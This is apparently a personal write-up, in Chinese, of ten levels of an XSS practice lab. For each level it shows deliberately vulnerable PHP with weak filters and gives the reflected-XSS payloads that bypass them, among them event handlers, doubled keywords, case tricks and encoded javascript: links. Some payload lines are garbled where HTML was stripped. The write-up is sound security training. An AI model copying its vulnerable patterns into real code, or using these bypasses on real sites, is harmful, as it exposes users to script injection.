忘记啥时候下载的练习题,无聊拿出来做做。
打开后随便点一下进入第一关:
第一关
image.png
源码:
欢迎来到level1
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "
欢迎用户".$str."
";?>
echo "
payload的长度:".strlen($str)."
";?>
分析:没有做任何过滤
payload为:name=
第二关:
image.png
源码:
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:有两处输出,第一处在PHP代码块的echo中输出,第二处在表单input中输出,第一处用htmlspeciachars()做了转义,第二处并没有做限制,让payload在第二处起效果就好,有2种方法。
1.不逃逸input标签闭合前边的双引号加个事件触发xss即可:
移动下鼠标即可触发payload为: " οnmοuseοver="alert(/xss/)
点击输入框即可触发payload为: " οnclick="alert(/xss/)
点击输入框即可触发payload为: " οnfοcus="alert(/xss/)
2.逃逸出input标签执行另外的标签触发xss即可:
用标签payload为: ">
用标签payload为:"> //浏览器可能会过滤这个
用标签payload为: ">xss
用标签payload为:xss // 移动鼠标至框内
payload太多了,大同小异能用就行
第三关:
image.png
源码:
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
"."?>
分析:这次它将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果的,而且源码中的value是用单引号,看来是有意让我使用单引号。
payload为:' οnmοuseοver='alert(/xss/) //其他payload省略
第四关:
image.png
源码:
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:这里的俩个输出点,一个被转义,另外一个将尖括号替换为空,但是这并不影响啊,按照上两题的套路,虽然不能闭合标签,单照样可以在input标签里边出发xss的。
payload为:" οnfοcus="alert(/xss/) //鼠标点击输入框出发,其他payload省略
第五关:
image.png
源码:
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:貌似还是和前几题差不多只是将
第六关:
image.png
源码:
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:代码中它还是进行了关键字过滤,但是没有了strtolow()函数,那么进行大小写绕过即可:
1.在input标签中触发XSS:
payload为:" ONmouseover="alert(/xss/) //等等...
2.跳出input标签触发XSS:
payload为:"> //等等...
第七关:
image.png
源码:
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:这道题出题人似乎把上边遇到的缺陷都补充了,但是程序有意的将特殊字符替换成空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
1.在input标签中触发:
payload为:" oonnmouseover="alert(/xss/) //等等...
2.跳出input标签触发:
payload为:">alert(/xss/) //等等...
第八关:
image.png
源码:
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '
?>
echo '
?>
分析:这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之鱼加了一个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为javascript被过滤对其进行编码绕过再点击友情链接即可。
payload为:javascript:alert(/xss/)
第九关:
image.png
源码:
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '
?>
if(false===strpos($str7,'http://'))
{
echo '
}
else
{
echo '
}
?>
分析:这次在上一题的基础上加入了strpos()函数,查找如果url中找到'http'那么会返回找到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么可以向输入框加进去就可以绕过了。
payload为:javascript:alert(/xss/)//http://
第十关:
image.png
源码:
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("
echo "
没有找到和".htmlspecialchars($str)."相关的结果.
".'?>
分析:这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数即'$str33',过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者是onclick,需要将隐藏表单显示出来触发:
payload为:url后加 &t_sort=xss" οnmοuseοver=alert(/xss/) type="text"
payload为:url后加 &t_sort=xss" οnclick=alert(/xss/) type="text"